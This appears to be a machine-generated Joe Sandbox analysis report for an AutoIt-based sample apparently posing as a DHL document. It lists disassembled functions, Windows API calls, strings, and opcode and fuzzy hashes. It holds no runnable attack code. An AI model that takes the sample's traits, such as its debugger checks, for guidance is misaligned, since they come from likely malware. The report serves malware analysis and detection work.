                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                                                                      • Instruction ID: c3f19aea89b4fa0db0f60621f082e408bfed9b825b981aef5d9d50f1dc6043df
                                                                                      • Opcode Fuzzy Hash: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                                                                      • Instruction Fuzzy Hash: D901A2B5B851096ADF15EBA0CE52EFF77EC9F51340F140019B916672C2EA70AE08E7B1
                                                                                      Function 00091C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00091CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                                                                      • Instruction ID: 024ce599bdb4089758a28438e3e6c3f54b5be5e5851129f8ce2c4d47d48dbf05
                                                                                      • Opcode Fuzzy Hash: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                                                                      • Instruction Fuzzy Hash: 6E01ADB5B8011966DF15EBA0CA02EFE77EC9B11340F540025B906B72C2EAA09F08E6B1
                                                                                      Function 00091D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00091DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 6b3fa242396f46484c2ce2150352e3c6b7df126d99987a0de8cd488bcf39bfb8
                                                                                      • Instruction ID: c1c2085fa7ca9470441f71fe3935cc54f79c88a08129ffb4484263e525d74e8c
                                                                                      • Opcode Fuzzy Hash: 6b3fa242396f46484c2ce2150352e3c6b7df126d99987a0de8cd488bcf39bfb8
                                                                                      • Instruction Fuzzy Hash: CAF0F471B4121966DF15E7A4CD52EFF77ACAF01340F040915B922A72C2DAB0590896A0
                                                                                      Function 000C90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0008769C,?,?,?), ref: 000C9111
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 000C90F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageProcSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 982171247-1923361398
                                                                                      • Opcode ID: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                                                                      • Instruction ID: d1b8728a5d8dcf904e89183555395bf1c0314233c71c75b053b3013b66d8fa69
                                                                                      • Opcode Fuzzy Hash: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                                                                      • Instruction Fuzzy Hash: 0401BC30100204BBEB219F14DC4AFAA3BA6FB85765F14006CFA551A2E1CB726C91CB50
                                                                                      Function 000B747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: 3, 3, 16, 1
                                                                                      • API String ID: 176396367-3042988571
                                                                                      • Opcode ID: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                      • Instruction ID: efb95153b906ceb65668031241f52209e4d6d6e094c974f2140b0704b9824aca
                                                                                      • Opcode Fuzzy Hash: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                      • Instruction Fuzzy Hash: 8FE09B1661522024927112799CC29FF56C9DFC5752714182BFE89C2267EB94CDD193A1
                                                                                      Function 00090B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00090B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 18516c8aa760075fc64b1de9b8477bd79cbd526c44755c3613bb8b5f3f497074
                                                                                      • Instruction ID: 4b7310273797221a175f82a3283486e221c52265c20df2247daa419c19667d45
                                                                                      • Opcode Fuzzy Hash: 18516c8aa760075fc64b1de9b8477bd79cbd526c44755c3613bb8b5f3f497074
                                                                                      • Instruction Fuzzy Hash: 15E0D8312483083AE2143754BC03FDD7A84CF05B15F10442AFB8C598C38AE2249056AD
                                                                                      Function 00050D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0004F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00050D71,?,?,?,0003100A), ref: 0004F7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0003100A), ref: 00050D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0003100A), ref: 00050D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00050D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                      • Instruction ID: 2043778dbd4ae73c1cbb23d61b3e0be130f6dfa3a1c594e5f4f39979ad2d11f0
                                                                                      • Opcode Fuzzy Hash: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                      • Instruction Fuzzy Hash: 97E012742007528BE3749FB8D504B9B7BF5BF04745F048D2DE886C7652DBB9E4488BA1
                                                                                      Function 000A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000A302F
                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 000A3044
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
                                                                                      • Opcode ID: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                                                                      • Instruction ID: bd32a276fbfac23f5fb68cde1c9268479b263714edd4c0c7418d7144954ac114
                                                                                      • Opcode Fuzzy Hash: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                                                                      • Instruction Fuzzy Hash: 66D05E7250032867EA20E7A4EC0EFDB3A6CDB04750F0002A1B759E6091DAB49984CAD0
                                                                                      Function 0008D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      • Opcode ID: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                                                                      • Instruction ID: d7a5d76dcd4e4438d37f64d2fadd7cce224b589ce0241ed945bd575da81bb041
                                                                                      • Opcode Fuzzy Hash: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                                                                      • Instruction Fuzzy Hash: 62D012A1808119F9CB60A7D0DC49DBDB37CFB28301F508563F94A92080D624C5086765
                                                                                      Function 000C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000C233F
                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                                                                      • Instruction ID: b366250a1b7fd531f4fe5c66ca88db9566a9639d639d933fcfc90b11031d30e5
                                                                                      • Opcode Fuzzy Hash: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                                                                      • Instruction Fuzzy Hash: 7AD01236794350B7F664B771DC0FFD67A149B00B14F004916B74AEA1D1C9F9A841DB54
                                                                                      Function 000C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C236C
                                                                                      • PostMessageW.USER32(00000000), ref: 000C2373
                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                                                                      • Instruction ID: 78ddd81c65cbb5c419173e7460aa116da7a6d74a226305ad84585e3891810fbd
                                                                                      • Opcode Fuzzy Hash: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                                                                      • Instruction Fuzzy Hash: 58D0C9327953507AF664B771DC0FFC676149B04B14F004916B74AEA1D1C9B9A8419A54
                                                                                      Function 0006BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0006BE93
                                                                                      • GetLastError.KERNEL32 ref: 0006BEA1
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006BEFC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1717984340-0
                                                                                      • Opcode ID: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
                                                                                      • Instruction ID: d02b1d0132bca92bc11f9ef8e2377df5001671b16985fe06fa05b1d2c27f2ab3
                                                                                      • Opcode Fuzzy Hash: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
                                                                                      • Instruction Fuzzy Hash: 4E41E4B5600206AFDF718FA5CC44ABA7BE6AF42310F144179F959D71B1DB318D81CB60